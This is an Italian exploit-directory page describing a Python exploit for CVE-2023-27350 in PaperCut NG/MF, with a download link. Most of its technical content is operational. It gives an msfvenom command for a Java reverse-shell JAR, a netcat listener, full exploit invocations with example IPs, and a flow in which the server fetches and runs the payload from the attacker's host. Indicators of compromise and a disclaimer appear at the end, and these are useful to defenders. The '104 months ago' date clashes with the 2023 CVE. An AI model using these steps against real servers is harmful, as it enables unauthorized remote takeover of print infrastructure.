Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PaperCut-Authentication_Bypass_and_RCE — Questo exploit si basa su CVE-2023-27350 ed è stato costruito a partire dall'exploit originale di horizon3ai e dal modulo Metasploit. | Kitploit
Strumenti/GitHubGitHub/joaoaugustom/papercut-authentication_bypass_and_rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e FormazioneStrumento di Accesso Remoto
GitHub
joaoaugustom/papercut-authentication_bypass_and_rce

PaperCut-Authentication_Bypass_and_RCE

Questo exploit si basa su CVE-2023-27350 ed è stato costruito a partire dall'exploit originale di horizon3ai e dal modulo Metasploit.

Vedi Repository
104 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-27350 — Bypass di Autenticazione e RCE su PaperCut NG/MF

Exploit Python standalone per la vulnerabilità critica di bypass dell'autenticazione e esecuzione remota di codice in PaperCut NG/MF. CVSS 9.8.

Descrizione

CVE-2023-27350 colpisce PaperCut NG e MF nelle versioni precedenti a 20.1.7, 21.2.11 e 22.0.9. La falla permette a un attaccante non autenticato di accedere all'endpoint /app?service=page/SetupCompleted — una pagina di configurazione raggiungibile solo durante l'installazione iniziale — e ottenere una sessione amministrativa valida senza alcuna credenziale.

Con accesso amministrativo, l'attaccante può abilitare il meccanismo di scripting di stampa di PaperCut e iniettare codice arbitrario eseguito dalla JVM del server, ottenendo RCE completa nel contesto dell'utente del servizio.

Versioni Affette

RamoVersione Corretta
20.x20.1.7
21.x21.2.11
22.x22.0.9

Le versioni 18.x e precedenti non hanno ricevuto patch ufficiali.

Implementazioni di Riferimento

Questo exploit è stato sviluppato dall'analisi di due implementazioni pubbliche:

1. horizon3ai/CVE-2023-27350 (Python)

  • Repository: https://github.com/horizon3ai/CVE-2023-27350
  • Approccio: usa Runtime.exec() con una stringa semplice per eseguire comandi
  • Limitazioni: Runtime.exec(String) non elabora metacaratteri shell (>&, |, 0>&1), rendendo inefficaci i payload di reverse shell. Lo script fissa anche l'ID della stampante (l1001) e controlla solo stringhe di successo in inglese, fallendo su istanze non inglesi.
  • Assunzione errata sul motore: non considera che PaperCut utilizza RhinoJS (non BeanShell), causando errori di sintassi in alcuni payload Java.

2. rapid7/metasploit-framework — Bypass di Autenticazione PaperCutNG

  • Modulo: exploit/multi/http/papercut_ng_rce
  • Approccio: carica un JAR di Metasploit nella JVM tramite URLClassLoader, evitando qualsiasi dipendenza dalla shell.
  • Limitazioni: richiede l'intero Metasploit Framework e genera un payload Java/Meterpreter; non facilmente adattabile per uso standalone con nc.

Requisiti

Python 3.x
requests
msfvenom (part of Metasploit Framework)
nc (netcat)
pip install requests

Utilizzo

1. Generare il payload JAR

msfvenom -p java/shell_reverse_tcp \
  LHOST=<YOUR_IP> LPORT=<SHELL_PORT> \
  -f jar -o payload.jar

2. Avviare un listener

nc -lvnp <SHELL_PORT>

3. Eseguire l'exploit

python exploit.py \
  -u http://<TARGET>:9191 \
  -j payload.jar \
  -lh <YOUR_IP> \
  -lp <HTTP_PORT> \
  -rp <SHELL_PORT>

Esempio:

python exploit.py \
  -u http://192.168.1.100:9191 \
  -j payload.jar \
  -lh 192.168.1.10 \
  -lp 9090 \
  -rp 4444

Parametri

ParametroDescrizionePredefinito
-u / --urlURL base di PaperCutrichiesto
-j / --jarPercorso del payload.jarrichiesto
-lh / --lhostIl tuo IP (il target si collegherà qui)richiesto
-lp / --lportPorta HTTP per servire il JAR9090
-rp / --rportPorta della reverse shell4444

Come Funziona

1. Auth bypass via /app?service=page/SetupCompleted
        ↓
2. Obtain admin JSESSIONID without credentials
        ↓
3. Select [Template Printer] (l1001)
        ↓
4. Inject RhinoJS script into the print script field
        ↓
5. Script creates a URLClassLoader pointing to our HTTP server
        ↓
6. PaperCut JVM downloads and executes payload.jar
        ↓
7. Reverse shell

Indicatori di Compromissione (IoC)

  • Accesso a /app?service=page/SetupCompleted senza una sessione precedente
  • Modifica delle impostazioni print-and-device.script.enabled e print.script.sandboxed (versioni >= 19)
  • Connessione HTTP in uscita dal server PaperCut a un IP esterno
  • Istanziazione di URLClassLoader con un URL esterno nei log JVM

Disclaimer Legale

Questo exploit è fornito a scopo educativo e solo per uso autorizzato (test di penetrazione, CTF, ambienti di laboratorio). L'uso non autorizzato contro sistemi senza permesso esplicito è illegale. L'autore non è responsabile per qualsiasi uso improprio.

Scarica lo strumento